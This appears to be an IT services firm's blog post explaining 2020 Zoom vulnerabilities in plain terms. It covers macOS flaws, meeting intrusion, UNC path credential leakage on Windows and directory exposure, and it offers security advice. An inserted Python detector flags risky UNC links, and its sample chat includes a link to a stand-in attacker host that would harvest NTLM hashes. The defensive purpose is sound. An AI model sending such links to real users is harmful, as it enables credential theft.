Wouldn’t you know it. Just as everyone piles on the Zoom wagon, there are vulnerabilities discovered. This always happens when software gets wide acceptance, as Bad Guys(TM) seek to capitalize on the popularity for technical or financial purposes. Usually it is to provide platforms for advertisements, which pay. Briefly, that is the motivation. So, why Zoom? What is so special about it?
Nothing. The flies are drawn to it because a lot of people are using it.
What are the threats? Not much more than you clicking a bad link any other way. Let’s take a look at the recent news:
1. Threatpost puts out an article about two vulnerabilities here. Both are in the Apple/Mac Zoom clients, summed up in the article thus:
The vulnerabilities come with the caveat that an attacker needs a local foothold on systems to exploit them – so bad actors would first need physical access to a victim’s computer. Another attack scenario could include a post-malware infection attack by a remote adversary with a preexisting foothold on the targeted system.
The [way into the system] has actually been deprecated [meaning old, unused] by Apple because it does not attempt to validate a binary being executed at root.
The second zero day flaw gives attackers Zoom’s mic and camera access, allowing for a way to record Zoom meetings, or snoop in on victims’ personal lives – sans a user access prompt.
Zoom requires access to a system microphone and camera due to its nature of being a web conferencing platform. While recent versions of macOS require explicit user approval for these permissions, Zoom has an “exception” that allows code to be injected by third party libraries.
So you are vulnerable to these if you run a Mac (a bad idea in a business environment) and you are prone to clicking on links without checking. While the above vulnerabilities are about Apple, the next condition that puts you at risk applies to any platform:
Moreover, you are at risk if you run normally as a ‘privileged user’, meaning one that can do risky actions like installing software without being asked for a password.
You should always run on your computer as an unprivileged, “normal”, non-root, non-Administrator user. Period. This way, if you click on a bad link, or accidentally try to do something unintentional, the system will not allow a ‘normal’ user to do so without FIRST asking for the username and password of a user who has those privileges. Anyone who has worked with me now has their business accounts set up this way.
This is simply someone uninvited joining your meeting.
There are simple guidelines to avoid this, like never posting joining/meeting info publicly and using the more complex URL for your meeting. If you go to settings, you are able to choose whether your invites go out with a nice 10-digit ID or a really long one of seemingly random characters.
This is really only necessary if you are doing the ‘don’t dos’ above, like publicly posting meeting details. If it is a private meeting, even if large, keep it private. See the Zoom.us site for more tips, as well as this nice article on Techcrunch.
3. Windows Zoom clients converting links to UNC
This is harder to put in lay terms, but let me summarize:
On Tuesday, security researchers uncovered a Universal Naming Convention (UNC) path injection vulnerability in the Zoom Windows client, which could enable attackers to steal Windows credentials of users. The flaw was first discovered by a Twitter user under the handle _g0dmode, and then verified by security researcher Matthew Hickey, with cybersecurity firm Hacker House.
In chat messages on its platform, Zoom automatically converts UNC paths into clickable links. A UNC path is a PC format for specifying the location of resources on a local-area network (LAN), which can be used to access network resources.
Once a victim in the chat clicks on the linked UNC path, Windows will attempt to connect to the link using an SMB file sharing protocol, according to a report by Bleeping Computer. By default, this transmits the victim’s login name and password.
So again, clicking on links that go to places you don’t know, or clicking anything in a public forum, is a bad idea. Oddly enough, this isn’t actually a Zoom “problem”, but rather the way Windows works. This is how you can go back into your server shares on another computer without re-entering credentials: it uses the ones you already used to log in.
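As an added illustration (not code from the article or from Zoom), the following Python scans chat messages for UNC paths of the form described above and flags any whose host is not an allow-listed internal name or a private-range address, since clicking such a link makes Windows open an outbound SMB connection and send the user's login name and NTLM password hash to that host. The internal host names and the sample chat lines are constructed for the example.

```python
import re
import ipaddress

# A UNC path: two backslashes, a host, a backslash, then a share name.
# The Zoom Windows client turned such strings in chat into clickable links.
UNC_RE = re.compile(r'\\\\([A-Za-z0-9._-]+)\\([^\s\\]+)')

# Hosts the defender trusts (constructed sample values, not from the article).
INTERNAL_HOSTS = {"fileserver", "fileserver.corp.example"}

def host_is_internal(host: str) -> bool:
    """True if the host is an allow-listed name or a private-range IP address."""
    if host.lower() in INTERNAL_HOSTS:
        return True
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False          # a hostname that is not on the allow list

def find_unc_paths(message: str):
    """Return (host, share) tuples for every UNC path in one chat message."""
    return UNC_RE.findall(message)

def flag_risky_unc(messages):
    """Return [(message_index, unc_path)] for UNC links that point outside the LAN.
    Following such a link sends the user's login name and NTLM hash to that host."""
    findings = []
    for i, msg in enumerate(messages):
        for host, share in find_unc_paths(msg):
            if not host_is_internal(host):
                findings.append((i, f"\\\\{host}\\{share}"))
    return findings

# Constructed sample chat export: one internal share, one external host,
# one private-range IP, and one ordinary web link.
SAMPLE_CHAT = [
    "Slides are on \\\\fileserver\\meetings\\q2.pptx",
    "check this out \\\\files.attacker.example\\share\\funny.gif",
    "also \\\\10.0.0.5\\docs",
    "normal text with a url https://example.com/page",
]

if __name__ == "__main__":
    for idx, path in flag_risky_unc(SAMPLE_CHAT):
        print(f"message {idx}: external UNC link {path}")
```

Blocking outbound SMB (TCP 445) at the perimeter prevents the credential exchange even when a user does click.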
4. It was announced that your “directory” contacts could be “leaked”.
Because this is a collaboration/sharing platform, when Zoom comes across others in your organization (same domain name, as described below), it will by default add them to your “directory” of users.
A separate Zoom issue, reported Wednesday by Motherboard, shows that Zoom is leaking the email addresses and photos of thousands of users. This is due to an issue in Zoom’s “Company Directory,” where the platform automatically adds people to others’ lists of contacts if they use an email address sharing the same domain.
“By default, your Zoom contacts directory contains internal users in the same organization, who are either on the same account or whose email address uses the same domain as yours (except for publicly used domains including gmail.com, yahoo.com, hotmail.com, etc) in the Company Directory section,” according to Zoom’s support page.
You can manage this directory in the app, change the settings above, and see the contacts whenever you click “invite” from inside a meeting. I never use this feature, preferring instead to use my email client. Some might see this as a great feature (like when you see all your company users in Outlook), some might not. To each their own, but at least Zoom allows you to choose the behavior that suits you.
So far, it seems like almost all of these vulnerabilities are only a concern if normal cyber-security best practices are ignored.
See us at The IT Guys to prepare you and your staff for this or any eventuality by creating Best Practices, Information Security Policies, and Employee Agreements. We provide not just ongoing full-service computing and networking for a flat rate, but all things that prepare your network for compliance and insurance.